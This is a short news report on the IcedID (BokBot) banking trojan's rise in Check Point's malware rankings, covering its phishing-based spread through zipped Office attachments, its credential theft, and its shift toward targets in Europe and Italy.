Cybersecurity researcher and Malware Hunter, JAMESWT: The link in the message points to a URL from which it downloads an exe: the malware.
CheckPoint: IcedID makes its debut “in style” in the top ten malware chart, coming straight into second place behind Dridex and before Lokibot
IcedID (aka BokBot) makes its debut “in style” in the top ten malware chart, coming straight into second place behind Dridex and before Lokibot. It has been denounced by CheckPoint cybersecurity experts. First seen in 2017, it has been spreading rapidly in March via several spam campaigns, impacting 11% of organizations globally. Once installed, the cybercrime trojan attempts to steal account details, payment credentials, and other sensitive information from users’ PCs. Furthermore, IcedID also has been used as the initial infection stage in ransomware operations, as Egregor. BokBot, in fact, BokBot) is fast becoming a leading player in the global cybercrime landscape.
How the trojan is spread and which are the targets
The cybercrime vehicle to spread IcedID are email phishing and spear phishing, which exploit real stolen mail conversations. They contain attachments compressed in zip format. Some are password protected, some are not. Inside them there are Office files (xlsm or doc have been detected so far), which contact one or more urls (different in each message) to download the dll and start the malware infection chain. BokBot, as it was discovered, was targeting financial institutions and banks in the United States, Canada and the United Kingdom. Now it seems that the attacks have moved to Europe and Italy appears to be one of the most affected countries.